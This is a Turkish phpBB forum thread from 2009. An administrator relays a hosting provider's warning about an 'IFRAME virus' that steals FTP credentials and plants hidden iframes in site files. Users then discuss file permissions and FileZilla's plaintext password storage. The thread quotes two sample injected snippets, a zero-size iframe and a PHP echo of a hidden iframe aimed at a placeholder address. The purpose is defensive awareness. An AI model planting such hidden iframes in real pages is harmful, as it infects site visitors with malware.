Web sayfamız sadece phpBB 3.0.x sürümlerine destek vermektedir. Konu açmadan, ileti yazmadan önce lütfen site kuralları sayfamıza göz atınız.

Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

İleti ALEXIS 17 Ağu 2009 15:31

markum.net ten gelen uyarı e-postasını aynen aktarıyorum:

------------------------------------------------

Bir süredir yaygınlaşmaya başlayan ve pek çok web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında sizi bilgilendirmek istiyoruz.

IFRAME Virüsü nedir?

Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.

Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.

Nasıl bulaşır :

1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.
2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.

IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.

IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.

IFRAME kod örnekleri:

Kod: Tümünü seç
<IFRAME src='http://siteadresi/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>


Kod: Tümünü seç
echo "<IFRAME src=\"http://siteadresi\123" width=1 height=1 style=\"visibility:hidden;position:absolute\"></IFRAME>";


Korunmak için yapmanız gerekenler:

1. FTP şifrenizi değiştiriniz.
2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.

Sitelerinizi kontrol ediniz:

Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.

Zararlı kod bulaşmış dosyalarınızı temizleyiniz.

IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.

Siteniz Google'da saldırgan site olarak listeleniyorsa:

IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:

1. http://www.google.com/webmasters/tools/ adresine giriş yapınız.
2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız.
3. Sitenizi ekleyerek doğrulayınız.
4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.
5. Sol menüden "Siteyi tekrar değerlendirme" seçeneğine tıklayın …
6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.
7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !

IFRAME Virüsü hakkında bilgi için:
http://www.google.com.tr/search?sourcei ... %bcs%c3%bc
ALEXIS
yönetici
yönetici

Kullanıcı avatarı

İleti: 3628
Kayıt: 03 Arl 2006 08:57
HTML: Çok iyi
CSS: İyi
PHP: İyi
phpBB3: Çok iyi
Sürüm: phpBB 3

Re: Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

İleti ErAy 17 Ağu 2009 18:43

Merak ettiğim bir nokta var iframe virüsü tarayıcıdan açılan sitenin kontrol panelinden , ftp sistemi ile bulaşırmı?Sonuçta program kullanmadan ftp ye giriş yapılıyor.
ErAy
kullanıcı
kullanıcı

Kullanıcı avatarı

İleti: 351
Kayıt: 01 Nis 2008 19:15
Konum: İzmir
İsim: Erhan
HTML: Orta
CSS: Başlangıç
PHP: Başlangıç
phpBB3: İyi
Sürüm: phpBB 3.0.11

Re: Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

İleti sabri ünal 19 Ağu 2009 00:20

sitenizdeki dosyaları yapılandırırken aşağıdaki chmod izinlerini ihmal etmeyiniz...

dosya izinleri -> 444
klasör izinleri -> 555

bir değişiklik yaptıktan sonra, dosya izinlerini açıp kapatmayı ihmal etmeyin...

özel izinlere sahip dizinler varsa daha sonra ilgili dizinlerin chmod ayarlarını güncellemeyi de ihmal etmeyin...
sabri ünal
kullanıcı
kullanıcı

Kullanıcı avatarı

İleti: 647
Kayıt: 06 Nis 2007 11:08
İsim: sabri ünal
HTML: İyi
CSS: Başlangıç
PHP: Başlangıç
phpBB3: Başlangıç
Sürüm: phpbb3 CVS

Re: Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

İleti Akansu 20 Ağu 2009 11:46

Birkaç aylık bir konu... Modası geçiyor. FileZilla kullanmamak lazım. Cracklı Cute FTP kullanmamak lazım.

En temizi Firefox'un eklentisi olan FireFTP...

Ayrıca bkz: http://www.fatihhayrioglu.com/iframe-vi ... anin-yolu/
Akansu
kullanıcı
kullanıcı

Kullanıcı avatarı

İleti: 155
Kayıt: 29 May 2007 18:35
İsim: Akansu
HTML: Orta
CSS: Orta
PHP: Başlangıç
phpBB3: Orta
Sürüm: phpBB3

Re: Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

İleti sabri ünal 23 Ağu 2009 03:43

niye filezilla kullanMAmak lazımmış? crackli bir program gibi mi algılıyorsunuz? yoksa bizim henüz haberimiz olmayan bir açığımı var!
sabri ünal
kullanıcı
kullanıcı

Kullanıcı avatarı

İleti: 647
Kayıt: 06 Nis 2007 11:08
İsim: sabri ünal
HTML: İyi
CSS: Başlangıç
PHP: Başlangıç
phpBB3: Başlangıç
Sürüm: phpbb3 CVS

Re: Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

İleti ysl52 23 Ağu 2009 03:48

Filezilla kayıt edilen ftp kullanıcı adı ve parolaları düz txt metin formunda pc de sakladığından, bir virüs bulaştığında önce o dosyayı kopyalayıp sunucu erişim bilgilerine sahip olması söz konusu. O yüzden Filezilla bir zayıflığa sahip, buna karşı önlem olarak, Filezilla ile ftp kayıt bilgilerini kayıt etmemek tavsiye ediliyor.
ysl52
tercüme
tercüme

Kullanıcı avatarı

İleti: 1223
Kayıt: 07 Arl 2007 00:07
Konum: İstanbul
HTML: Başlangıç
CSS: Başlangıç
PHP: Orta
phpBB3: Orta
Sürüm: phpBB 3.0.7-PL1

Re: Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

İleti sabri ünal 23 Ağu 2009 03:53

o zaman filezilla ekibi biraz daha çalışmalı :) veya dediğiniz gibi şifreleri kaydetmemek daha makul.
sabri ünal
kullanıcı
kullanıcı

Kullanıcı avatarı

İleti: 647
Kayıt: 06 Nis 2007 11:08
İsim: sabri ünal
HTML: İyi
CSS: Başlangıç
PHP: Başlangıç
phpBB3: Başlangıç
Sürüm: phpbb3 CVS

Re: Web sitelerini tehdit eden IFRAME Virüsü hakkında duyuru

İleti izzet37 17 Ağu 2010 02:55

filezillanın site adreslerini kayıt ettiği dosyaya başka bir exe tarafından yazdırıyorlar mutlaka bir exe indirip kurduysanız veya başka bişey filezillada virüs yok ama öbür exe ondaki şifreleri alarak keylogger gibi faliyet göstermekte bilginize.
izzet37
kullanıcı
kullanıcı

İleti: 17
Kayıt: 16 Ağu 2010 03:28
İsim: izzet bal
HTML: İyi
CSS: Başlangıç
PHP: Başlangıç
phpBB3: Başlangıç
Sürüm: 3.0.2


Diğer Konular


Kimler çevrimiçi

Bu forumu görüntüleyenler: Kayıtlı kullanıcı yok ve 1 misafir

cron